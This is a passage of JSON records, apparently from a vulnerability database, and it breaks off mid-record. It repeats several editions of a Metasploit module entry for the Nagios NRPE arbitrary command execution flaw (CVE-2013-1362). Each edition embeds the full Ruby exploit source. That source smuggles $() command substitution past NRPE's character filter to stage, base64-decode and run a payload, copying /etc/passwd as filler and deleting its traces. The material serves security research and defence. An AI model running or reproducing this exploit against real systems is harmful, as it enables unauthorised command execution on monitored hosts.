datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-12T15:23:42", "differentElements": ["modified", "published"], "edition": 47}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-16T11:44:05", "history": [], "viewCount": 79, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-16T11:44:05"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-16T11:44:05", "differentElements": ["modified", "published"], "edition": 48}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-16T13:54:55", "history": [], "viewCount": 79, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-16T13:54:55"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-16T13:54:55", "differentElements": ["modified", "published"], "edition": 49}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-17T11:49:13", "history": [], "viewCount": 79, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-17T11:49:13"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-17T11:49:13", "differentElements": ["modified", "published"], "edition": 50}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-17T13:47:51", "history": [], "viewCount": 79, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-17T13:47:51", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-17T13:47:51", "differentElements": ["modified", "published"], "edition": 51}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-19T19:54:05", "history": [], "viewCount": 79, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-19T19:54:05", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor 